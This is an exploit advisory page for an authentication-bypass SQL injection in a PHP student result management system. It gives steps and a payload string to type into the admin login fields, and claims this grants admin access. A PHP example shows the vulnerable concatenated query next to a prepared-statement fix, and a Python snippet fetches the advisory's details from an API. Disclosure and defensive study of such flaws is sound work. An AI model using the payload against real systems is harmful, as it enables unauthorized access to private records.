Author: Ritesh Gohil
Platform: multiple
Release date: 2020-12-02
```
# Exploit Title: Student Result Management System 1.0 - Authentication Bypass SQL Injection
# Google Dork: N/A
# Date: 11/16/2020
# Exploit Author: Ritesh Gohil
# Vendor Homepage: https://projectnotes.org/it-projects/student-result-management-system-in-php-with-source-code/
# Software Link: https://projectnotes.org/download/studentms-zip/
# Version: 1.0
# Tested on: Win10 x64, Kali Linux x64
# CVE : N/A

######## Description ################################################################
#                                                                                   #
# An SQL injection vulnerability discovered in PHP Student Result Management System #
#                                                                                   #
# Admin Login Portal is vulnerable to SQL Injection                                 #
#                                                                                   #
# The vulnerability could allow for the improper neutralization of special elements #
# in SQL commands and may lead to the product being vulnerable to SQL injection.    #
#                                                                                   #
#####################################################################################

Kindly Follow Below Steps:

1. Visit the main page of the Student Result Management System.
2. You will get an Admin Login Page.
3. Payload which you can use in Email and password field: *AND 1=0 AND '%'=' *
4. You will get Admin Access of the Student Result Management System.
```
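The advisory does not show the application's login code. As an added example (not taken from the application or the advisory), the sketch below contrasts the string-concatenated query pattern that this class of bug comes from with a prepared statement. The `admin` table, its columns, the sample account and both function names are assumptions, and it uses an in-memory SQLite database through PDO so it runs offline.

```php
<?php
// Added example. Table/column names and both functions are hypothetical;
// the application's real login code is not shown in the advisory.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE admin (email TEXT PRIMARY KEY, password_hash TEXT NOT NULL)');

// Constructed sample account, stored with a password hash rather than plaintext.
$ins = $pdo->prepare('INSERT INTO admin (email, password_hash) VALUES (?, ?)');
$ins->execute(['admin@example.test', password_hash('correct horse', PASSWORD_DEFAULT)]);

// Vulnerable pattern: input is spliced into the SQL text, so a quote in the
// input ends the string literal and the remainder is parsed as SQL.
// This function only builds the string so the effect can be inspected.
function build_login_sql_unsafe(string $email, string $password): string
{
    return "SELECT * FROM admin WHERE email='$email' AND password='$password'";
}

// Hardened form: the statement text is fixed, the input is bound as data, and
// the password is checked against a hash instead of being compared in SQL.
function login_safe(PDO $pdo, string $email, string $password): bool
{
    $stmt = $pdo->prepare('SELECT password_hash FROM admin WHERE email = :email');
    $stmt->execute([':email' => $email]);
    $hash = $stmt->fetchColumn();   // false when no row matches
    return is_string($hash) && password_verify($password, $hash);
}

// String from step 3 of the advisory (surrounding asterisks omitted).
$payload = "AND 1=0 AND '%'='";

// With concatenation, the quotes in the input become part of the SQL grammar.
echo build_login_sql_unsafe($payload, $payload), PHP_EOL;

// With bound parameters, the same input is only ever compared as a value.
var_dump(login_safe($pdo, $payload, $payload));
var_dump(login_safe($pdo, 'admin@example.test', 'wrong password'));
var_dump(login_safe($pdo, 'admin@example.test', 'correct horse'));
```

Only the last call authenticates; the first two return `false` without raising a SQL error, which is the behaviour to assert in a regression test for the login handler.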
Release Date | Title | Type | Platform | Author |
---|---|---|---|---|
2020-12-02 | "Student Result Management System 1.0 - Authentication Bypass SQL Injection" | webapps | multiple | "Ritesh Gohil" |
```python
import requests

response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/49152/?format=json')
```